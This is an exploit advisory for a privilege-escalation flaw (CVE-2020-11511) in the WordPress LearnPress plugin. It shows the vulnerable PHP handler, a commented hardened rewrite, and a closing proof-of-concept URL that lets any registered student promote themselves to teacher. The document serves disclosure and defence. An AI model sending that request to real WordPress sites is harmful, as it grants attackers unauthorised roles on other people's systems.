# Exploit Title: WordPress Plugin LearnPress < 3.2.6.9 – User Registration Privilege Escalation
# https://www.exploit-db.com/exploits/50138
# https://packetstormsecurity.com/files/163538/WordPress-LearnPress-Privilege-Escalation.html
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.9
# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd
# CVE: CVE-2020-11511
The function learn_press_accept_become_a_teacher can be used to promote a registered user to the LearnPress teacher role, resulting in a privilege escalation. The handler never checks the capabilities of the requesting user (and carries no nonce), so any low-privileged user such as a student can trigger it for any user_id, including their own.
The function is hooked on plugins_loaded, so it runs on every request as soon as the active plugins are loaded; a logged-in user only has to send the action and user_id parameters to /wp-admin/.
function learn_press_accept_become_a_teacher() {
    // Both values come straight from the request, unvalidated.
    $action  = ! empty( $_REQUEST['action'] ) ? $_REQUEST['action'] : '';
    $user_id = ! empty( $_REQUEST['user_id'] ) ? $_REQUEST['user_id'] : '';
    if ( ! $action || ! $user_id || ( $action != 'accept-to-be-teacher' ) ) {
        return;
    }
    // No current_user_can() and no nonce check: any caller that reaches this point
    // with a user_id that is not already a teacher gets that user promoted.
    if ( ! learn_press_user_maybe_is_a_teacher( $user_id ) ) {
        $be_teacher = new WP_User( $user_id );
        $be_teacher->set_role( LP_TEACHER_ROLE );
        delete_transient( 'learn_press_become_teacher_sent_' . $user_id );
        do_action( 'learn_press_user_become_a_teacher', $user_id );
        $redirect = add_query_arg( 'become-a-teacher-accepted', 'yes' );
        $redirect = remove_query_arg( 'action', $redirect );
        wp_redirect( $redirect );
    }
}
// Hooked on plugins_loaded, so it runs on every request, front end and admin alike.
add_action( 'plugins_loaded', 'learn_press_accept_become_a_teacher' );
...snip..
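For comparison, below is a hardened version of the same handler. This is an added example written for this page, not LearnPress's own code and not the vendor's actual patch for 3.2.6.9. It assumes LP_TEACHER_ROLE and learn_press_user_maybe_is_a_teacher() exist as in the listing above; the capability used for gating ('manage_options'), the nonce action name 'lp-accept-teacher-<id>', and the choice of the admin_init hook are this example's assumptions.

```php
<?php
// Added example (hypothetical hardening, not the plugin's code): the three things the
// vulnerable handler lacks are an authorisation check, a CSRF (nonce) check, and input
// sanitisation. It is also moved from plugins_loaded to admin_init, which only fires
// after WordPress has authenticated the admin-side request.

function learn_press_accept_become_a_teacher_hardened() {
    // Only admin-side requests should be able to reach this action at all.
    if ( ! is_admin() ) {
        return;
    }

    // Normalise input before using it: sanitize_key() for the action slug,
    // absint() for the user id (0 means "not a valid id").
    $action  = isset( $_REQUEST['action'] ) ? sanitize_key( wp_unslash( $_REQUEST['action'] ) ) : '';
    $user_id = isset( $_REQUEST['user_id'] ) ? absint( $_REQUEST['user_id'] ) : 0;

    if ( 'accept-to-be-teacher' !== $action || 0 === $user_id ) {
        return;
    }

    // 1. Authorisation: the check missing from the vulnerable version. A subscriber
    //    must not be able to promote anyone, including themselves. 'manage_options'
    //    is an assumption; use whatever capability the site grants to approvers.
    if ( ! is_user_logged_in() || ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to approve teacher requests.', 'learnpress' ), 403 );
    }

    // 2. CSRF protection: the approval link must carry a nonce bound to the specific
    //    user being promoted, so an admin cannot be tricked into approving via a
    //    crafted link. check_admin_referer() dies on a missing or invalid nonce.
    check_admin_referer( 'lp-accept-teacher-' . $user_id, '_wpnonce' );

    // 3. The target must be a real user who is not already a teacher.
    $be_teacher = get_userdata( $user_id );
    if ( ! $be_teacher || learn_press_user_maybe_is_a_teacher( $user_id ) ) {
        return;
    }

    $be_teacher->set_role( LP_TEACHER_ROLE );
    delete_transient( 'learn_press_become_teacher_sent_' . $user_id );
    do_action( 'learn_press_user_become_a_teacher', $user_id );

    // Strip the one-shot parameters so the nonce is not left in a bookmarkable URL.
    $redirect = add_query_arg( 'become-a-teacher-accepted', 'yes' );
    $redirect = remove_query_arg( array( 'action', '_wpnonce', 'user_id' ), $redirect );
    wp_safe_redirect( $redirect );
    exit;
}
add_action( 'admin_init', 'learn_press_accept_become_a_teacher_hardened' );

/**
 * Build the approval link that would be sent to an administrator (hypothetical
 * helper). The nonce is tied to the user id, so a link issued for one user cannot
 * be replayed to promote a different one.
 */
function learn_press_accept_become_a_teacher_link( $user_id ) {
    $url = add_query_arg(
        array(
            'action'  => 'accept-to-be-teacher',
            'user_id' => absint( $user_id ),
        ),
        admin_url()
    );
    return wp_nonce_url( $url, 'lp-accept-teacher-' . absint( $user_id ), '_wpnonce' );
}
```

With this in place the PoC request below fails twice over: a student hitting /wp-admin/?action=accept-to-be-teacher&user_id=N is stopped by current_user_can(), and even an administrator following a link without a valid _wpnonce is stopped by check_admin_referer().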
POC:
1. Find your own user ID
2. Log in with your credentials (any registered account, e.g. a student)
3. Send the payload below; the response redirects with become-a-teacher-accepted=yes once the role has been changed
http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>
# Done!